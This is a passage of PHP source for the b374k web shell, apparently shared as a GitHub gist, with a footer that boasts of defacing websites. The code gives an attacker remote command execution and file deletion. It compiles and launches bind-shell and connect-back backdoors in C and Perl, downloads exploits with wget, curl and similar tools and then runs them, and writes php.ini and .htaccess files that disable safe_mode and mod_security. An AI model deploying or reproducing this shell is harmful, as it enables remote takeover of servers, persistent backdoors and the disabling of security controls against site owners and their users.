<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
<tr><td><select size="1" class="inputz" name="pilihan">
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</option>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>
</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
</tr>
</table>
<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
// bind connect with c
if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdc.c",$port_bind_bd_c);
exe("gcc -o bdc bdc.c");
exe("chmod 777 bdc");
@unlink("bdc.c");
exe("./bdc ".$port." ".$passwrd." &");
$scan = exe("ps aux");
if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
}
// bind connect with perl
elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdp",$port_bind_bd_pl);
exe("chmod 777 bdp");
$p2=which("perl");
exe($p2." bdp ".$port." &");
$scan = exe("ps aux");
if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
}
// back connect with c
elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis("bcc.c",$back_connect_c);
exe("gcc -o bcc bcc.c");
exe("chmod 777 bcc");
@unlink("bcc.c");
exe("./bcc ".$ip." ".$port." &");
$msg = "Now script try connect to ".$ip." port ".$port." ...";
}
// back connect with perl
elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis("bcp",$back_connect);
exe("chmod +x bcp");
$p2=which("perl");
exe($p2." bcp ".$ip." ".$port." &");
$msg = "Now script try connect to ".$ip." port ".$port." ...";
}
elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
{
$pilihan = trim($_POST['pilihan']);
$wurl = trim($_POST['wurl']);
$namafile = download($pilihan,$wurl);
if(is_file($namafile)) {
$msg = exe($wcmd);
}
else $msg = "error: file not found $namafile";
}
?>
<table class="tabnet">
<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
<tr>
<td>
<table>
<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
</table>
</td>
<td>
<table>
<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
</table>
</td>
<td>
<table>
<form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
</tr>
<tr><td><select size="1" class="inputz" name="pilihan">
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</option>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>
</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
</table>
</td>
</tr>
</table>
<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
<form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
<table class="cmdbox">
<tr><td colspan="2">
<textarea class="output" readonly>
<?php
if(isset($_POST['submitcmd'])) {
echo @exe($_POST['cmd']);
}
?>
</textarea>
<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
</table>
</form>
<?php }
else {
if(isset($_GET['delete']) && ($_GET['delete'] != "")){
$file = $_GET['delete'];
@unlink($file);
}
elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
@rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
}
elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
$path = $pwd.$_GET['mkdir'];
@mkdir($path);
}
$buff = showdir($pwd,$prompt);
echo $buff;
}
?>
<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />
<?php
if(isset($_POST['ini']))
{
$byphp = "safe_mode = Off
disable_functions = None
safe_mode_gid = OFF
open_basedir = OFF
allow_url_fopen = On";
$byht = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule>";
file_put_contents("php.ini",$byphp);
file_put_contents(".htaccess",$byht);
echo "<script>alert('Disable Functions and Safemode Created'); hideAll();</script>";
die();
}
?>
<center>
<center><br><br><div class="info">-=[ b374k r3c0ded by <b>Ismail<b> And r3c0ded again by Cyberbaghost</b> ]=-</div><br>
<div class="jaya">&copy; 2014 cyberbaghost</div></center>
<style>
#bsautoscroll{position:fixed;z-index:9999;bottom:0;left:0}
#bsautoscroll a{display:block;float:left;background-color:#0000FF;background-image:url(http://4.bp.blogspot.com/-cbl1BzEtRn0/UaCHAbq7E8I/AAAAAAAADGQ/sSfZLUJoeuM/s1600/BS+Auto+Scroll.png);width:36px;height:36px;text-indent:-999em}
#bsautoscroll a.bsup{background-position:0 -36px}
#bsautoscroll a.bsdown{background-position:0 -72px}
#bsautoscroll a.bsbottom{background-position:0 -108px}
#bsautoscroll a.bsstop{background-position:0 -180px}
#bsautoscroll a:hover{background-color:#ffffFF}
</style>
<script>
function autoScroll(){window.scrollBy(0,1);scrolldelay=setTimeout(&#39;autoScroll()&#39;,50)}
function stopScroll(){clearTimeout(scrolldelay)}
</script>
<div id='bsautoscroll'>
<a class='bstop' href='javascript:window.scrollTo(0,0);' rel='nofollow' title='To Top'>To Top</a>
<a class='bsup' href='javascript:window.scrollBy(0,-window.innerHeight);' rel='nofollow' title='Page Up'>Page Up</a>
<a class='bsdown' href='javascript:window.scrollBy(0,window.innerHeight);' rel='nofollow' title='Page Down'>Page Down</a>
<a class='bsbottom' href='javascript:window.scrollTo(0,999999);' rel='nofollow' title='To Bottom'>To Bottom</a>
</div>
<embed src="http://divine-music.info/musicfiles/Bon Jovi - Always.swf" autostart="TRUE" loop="TRUE" width="1" height="1" align="CENTER"></embed></center>
<center><br><br>
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#003300 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b> </div><div class="end" id='footer' style="margin-top: 20px;">
<p align="center"><b>CONTACT ME</b><br />
^_^ <a href="https://twitter.com/cyberbaghost">My Twitter</a> |<a href="http://m.facebook.com/bagus.w.crew?">My Facebook</a> ^_^ <br />
\m/ <b>Greetz to</b> : Warcops Cyber Team (RIP), Admin and all GFI Members! We'll Always rock \m/<br /> </b></p></td></tr></table><marquee>
All I remember were those lonely nights when I was defacing those insecure websites</marquee>
</p>
</div>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment